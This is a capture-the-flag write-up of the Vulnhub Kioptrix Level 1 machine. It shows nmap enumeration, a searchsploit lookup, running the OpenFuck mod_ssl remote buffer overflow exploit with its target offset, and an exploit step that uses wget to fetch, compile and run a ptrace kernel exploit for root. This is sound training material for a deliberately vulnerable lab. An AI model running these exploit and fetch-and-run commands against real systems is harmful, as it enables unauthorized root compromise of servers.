Welcome to the Kioptrix-1 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-1

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Kioptrix: Level 1 (#1)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 08:36 CEST
Nmap scan report for 172.20.10.6
Host is up (0.00021s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,139,443,1024 172.20.10.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 08:37 CEST
Nmap scan report for 172.20.10.6
Host is up (0.00049s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-06-30T06:40:11+00:00; +1m51s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 172.20.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.82 seconds

After a lot of listing without finding anything, I start to check if the versions reported by Nmap have any exploits in searchsploit.

Looking at the output corresponding to port 80 we can see the version of mod_ssl 2.8.4, if we look for it in searchsploit we can see several exploits that take advantage of a remote buffer overflow.

$ searchsploit apache mod_ssl
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                   | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                        | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow              | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)        | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)        | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_A | unix/remote/40347.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Exploitation

Let's try with the first option of the version 2 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1).

$ cp /usr/share/exploitdb/exploits/unix/remote/764.c .
$ cat 764.c | grep gcc
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto

When wanting to compile the exploit, it reports several bugs. In this link they show us how to correct them.

Ok, now we need to know what target offset we need.

$ ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

Well, after testing each of the results, we see that we get shell with offset 0x6b.

$ ./OpenFuck 0x6b 172.20.10.6 -c 50

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304 
--04:45:18--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

15:18:01 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 13993
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
/bin/bash -i
bash: no job control in this shell
stty: standard input: Invalid argument
[[email protected] tmp]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[[email protected] tmp]#

Nice! we have shell and we are directly root!